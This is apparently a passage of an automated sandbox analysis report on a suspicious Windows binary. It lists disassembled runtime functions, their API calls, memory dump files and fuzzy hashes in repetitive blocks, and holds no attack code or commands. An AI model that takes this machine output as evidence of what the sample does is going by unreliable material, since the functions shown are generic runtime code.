                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 732f2ef30e95fe22a4566c62017bd57b31e294ae7f7598eaf6697a346db74a0e
                          • Instruction ID: 1defced225338ac0f2c197732e8bb24d1b1815673955e81736f355caeaef986f
                          • Opcode Fuzzy Hash: 732f2ef30e95fe22a4566c62017bd57b31e294ae7f7598eaf6697a346db74a0e
                          • Instruction Fuzzy Hash: AC01A272914619EFDB159F50CC05FAFBBBCFB84B25F004626E815A22D0DB749840DA90
                          APIs
                          • __alloca_probe_16.LIBCMT ref: 00965034
                          • __alloca_probe_16.LIBCMT ref: 009650F5
                          • __freea.LIBCMT ref: 0096515C
                            • Part of subcall function 00963E93: HeapAlloc.KERNEL32(00000000,0095554A,?,?,0095996A,?,?,?,00000000,?,0095278B,0095554A,?,?,?,?), ref: 00963EC5
                          • __freea.LIBCMT ref: 00965171
                          • __freea.LIBCMT ref: 00965181
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: __freea$__alloca_probe_16$AllocHeap
                          • String ID:
                          • API String ID: 1096550386-0
                          • Opcode ID: 918e686236c8dd970e1f89862218d2d8bd747b8c0fcbfa5a03b9b041287eccc8
                          • Instruction ID: 03b78275602fb19d5149efc9405222c625a15a72f097ea6429a4cc20b714bd6d
                          • Opcode Fuzzy Hash: 918e686236c8dd970e1f89862218d2d8bd747b8c0fcbfa5a03b9b041287eccc8
                          • Instruction Fuzzy Hash: 9351D172604606AFEB219FA4CC81FBB7AADEF45350F270529FD08E6151EB71CD1087A0
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 009560DF
                          • AcquireSRWLockExclusive.KERNEL32(?,?,00954F82,?,?,00953F83), ref: 009560FE
                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00954F82,?,?,00953F83), ref: 0095612C
                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00954F82,?,?,00953F83), ref: 00956187
                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00954F82,?,?,00953F83), ref: 0095619E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: AcquireExclusiveLock$CurrentThread
                          • String ID:
                          • API String ID: 66001078-0
                          • Opcode ID: e383a1d3b25076427cac5e4312e9880f431cc5b91adf453c214c805262cc7c9e
                          • Instruction ID: 05957a43e8cd6bee7417f73b03efb33419dcd00ca0c256e3548a921ba57e2f94
                          • Opcode Fuzzy Hash: e383a1d3b25076427cac5e4312e9880f431cc5b91adf453c214c805262cc7c9e
                          • Instruction Fuzzy Hash: 5F416E31508A06DFCB20CF66C885A7AB7F8FF45312B90492AD84AD7542DB30F989CB50
                          APIs
                          • __EH_prolog3.LIBCMT ref: 009565E6
                          • std::_Lockit::_Lockit.LIBCPMT ref: 009565F1
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0095665F
                            • Part of subcall function 00956742: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0095675A
                          • std::locale::_Setgloballocale.LIBCPMT ref: 0095660C
                          • _Yarn.LIBCPMT ref: 00956622
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          • Opcode ID: 39f7ac64316e327f726b1de21d54a72ce86bce334802157b1bf974ce599483e6
                          • Instruction ID: 2a98d551f1cf6bcf7f58329fb805818ff22daedc4e93fbea90bf290582d25996
                          • Opcode Fuzzy Hash: 39f7ac64316e327f726b1de21d54a72ce86bce334802157b1bf974ce599483e6
                          • Instruction Fuzzy Hash: 9701DFB6A00110DBC706EF21D855A7D3BA1BFC4746BA94008EC1957391DF746E4ADB85
                          APIs
                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0095CA88,?,?,00000000,?,?,?,0095CBB2,00000002,FlsGetValue,00972068,FlsGetValue), ref: 0095CAE4
                          • GetLastError.KERNEL32(?,0095CA88,?,?,00000000,?,?,?,0095CBB2,00000002,FlsGetValue,00972068,FlsGetValue,?,?,0095B9F5), ref: 0095CAEE
                          • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0095CB16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: 23d0a2bd8ed9866d8ae2f3520c9c9b90ce19afdaeb0e4e00c126e16d478ace5d
                          • Instruction ID: 6558656044be6eca273342e15c907023415848dddf64e502e583c99c938a6790
                          • Opcode Fuzzy Hash: 23d0a2bd8ed9866d8ae2f3520c9c9b90ce19afdaeb0e4e00c126e16d478ace5d
                          • Instruction Fuzzy Hash: 4CE01A71694349FEEA201BA2EC0AF193A59AB40B95F108020F90DB80E2D7A29854E6A4
                          APIs
                          • GetConsoleOutputCP.KERNEL32(48294190,00000000,00000000,00000000), ref: 009655D9
                            • Part of subcall function 00968035: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00965152,?,00000000,-00000008), ref: 009680E1
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00965834
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0096587C
                          • GetLastError.KERNEL32 ref: 0096591F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 52f4f0a03b10e4b53e4cc79f3119e41f4bbdd0bacb1562762aea458f8368362c
                          • Instruction ID: c39157a87400b64ae9643e8a3d09e15ece4f298778176a42e3c9d173c3500dff
                          • Opcode Fuzzy Hash: 52f4f0a03b10e4b53e4cc79f3119e41f4bbdd0bacb1562762aea458f8368362c
                          • Instruction Fuzzy Hash: F2D17875D00648DFCF15CFA8D880AADBBB9FF48314F19852AE856E7251E730A941CF50
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: ce0db72b0a19b7f8c106dcc35223018192ecf894a421d53609b10acfb6386408
                          • Instruction ID: 0e93a0331d2cd0630a895f27c7bfcb1287b04fb6abd23bed577cf60b37f430dc
                          • Opcode Fuzzy Hash: ce0db72b0a19b7f8c106dcc35223018192ecf894a421d53609b10acfb6386408
                          • Instruction Fuzzy Hash: 9951F772A04606DFDB28CF17D841B7AB3A8EF84302F14442DED8557191EB71EC88DB94
                          APIs
                            • Part of subcall function 00968035: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00965152,?,00000000,-00000008), ref: 009680E1
                          • GetLastError.KERNEL32 ref: 00968359
                          • __dosmaperr.LIBCMT ref: 00968360
                          • GetLastError.KERNEL32(?,?,?,?), ref: 0096839A
                          • __dosmaperr.LIBCMT ref: 009683A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 7b1326ec828b6e9245ffc6b299f8a88955705cc00073d1244e0553e22472a6d6
                          • Instruction ID: 6ea2d638091a3abc399bf8a1c0a424f815e2959aff7eee531d7d8097e89203a9
                          • Opcode Fuzzy Hash: 7b1326ec828b6e9245ffc6b299f8a88955705cc00073d1244e0553e22472a6d6
                          • Instruction Fuzzy Hash: 98218E71600209AFDB20EF66C891E6BB7ADFF947647108A28FD6997651DF34EC408B90
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b935b3c6d5f3648db5be1281ae51becc0b13303688d0eedbf1678464f09b4827
                          • Instruction ID: 681109e39f26b4ff693f0dfa9f55df845d7b6ce346a52a304edfcc5f24e481db
                          • Opcode Fuzzy Hash: b935b3c6d5f3648db5be1281ae51becc0b13303688d0eedbf1678464f09b4827
                          • Instruction Fuzzy Hash: E0219231200205AFCB20EF66DCA2E6B776DAF813767104935FD1997162D734DC4C8790
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 00969293
                            • Part of subcall function 00968035: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00965152,?,00000000,-00000008), ref: 009680E1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009692CB
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009692EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 3bcec75dc69a322a730973143a2b2973ffc26c8cb131c7965fd041071c3848c5
                          • Instruction ID: 682cb4e8899ccc5d68f2bf89fcffde182e11e550ad776473448606b4cb7719d5
                          • Opcode Fuzzy Hash: 3bcec75dc69a322a730973143a2b2973ffc26c8cb131c7965fd041071c3848c5
                          • Instruction Fuzzy Hash: 0B11D2B2909615BF6B1127B19C8DDBF7A5CDFCA3E87500424F406E6242EA74DE4191B1
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 00951F67
                          • int.LIBCPMT ref: 00951F7A
                            • Part of subcall function 00952D8F: std::_Lockit::_Lockit.LIBCPMT ref: 00952DA0
                            • Part of subcall function 00952D8F: std::_Lockit::~_Lockit.LIBCPMT ref: 00952DBA
                          • std::_Facet_Register.LIBCPMT ref: 00951FAD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00951FC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                          • String ID:
                          • API String ID: 459529453-0
                          • Opcode ID: f770d334c88ee4aac2d9fb283e90ccb2df85ea45361ec5a56ae6543031241a79
                          • Instruction ID: 77bfa50fd374e5f5806a2aab36706db5e0026a4a837625cd065653fec9b02017
                          • Opcode Fuzzy Hash: f770d334c88ee4aac2d9fb283e90ccb2df85ea45361ec5a56ae6543031241a79
                          • Instruction Fuzzy Hash: F1012B72904114AFCB14FB56D805AAD77ECDFC0361B114108FC0497292EB309E49D7C0
                          APIs
                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000), ref: 0096D8A5
                          • GetLastError.KERNEL32(?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000,00000000,00000000,?,00965EFA,?), ref: 0096D8B1
                            • Part of subcall function 0096D877: CloseHandle.KERNEL32(FFFFFFFE,0096D8C1,?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000,00000000,00000000), ref: 0096D887
                          • ___initconout.LIBCMT ref: 0096D8C1
                            • Part of subcall function 0096D839: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0096D868,0096C7B5,00000000,?,00965973,00000000,00000000,00000000,00000000), ref: 0096D84C
                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0096C7C8,00000000,00000001,00000000,00000000,?,00965973,00000000,00000000,00000000,00000000), ref: 0096D8D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: a25c47f5693d86e9e2838397c77e7bca3537ecbf9208fd89a61c5a2f22969f41
                          • Instruction ID: 460f1d8c2eb831e24a886ee62fea5bf3f745ff26bd6ac7d229783127164aec27
                          • Opcode Fuzzy Hash: a25c47f5693d86e9e2838397c77e7bca3537ecbf9208fd89a61c5a2f22969f41
                          • Instruction Fuzzy Hash: F2F0AC36925114BBCF222FA5DC08B9D7F66FB893A1F054010FA1DD6160DA328860EB90
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 0095C10C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 7ea4d9f812c7b76be2f9da27f8768a3e838252cc7da4efe6b540e68777a9d36e
                          • Instruction ID: a51d79c4dbc9c1738afafb8239cf6e3f41470145bc396c7a9cc4d7a8221753e1
                          • Opcode Fuzzy Hash: 7ea4d9f812c7b76be2f9da27f8768a3e838252cc7da4efe6b540e68777a9d36e
                          • Instruction Fuzzy Hash: 494178B2900209AFCF16DF99CC81AAEBBB9BF48305F148058FE04A7252D335A954DF60
                          APIs
                          • __alloca_probe_16.LIBCMT ref: 0095602B
                          • RaiseException.KERNEL32(?,?,?,009551E7,?,?,?,?,?,?,?,?,?,?,009551E7,00000001), ref: 00956050
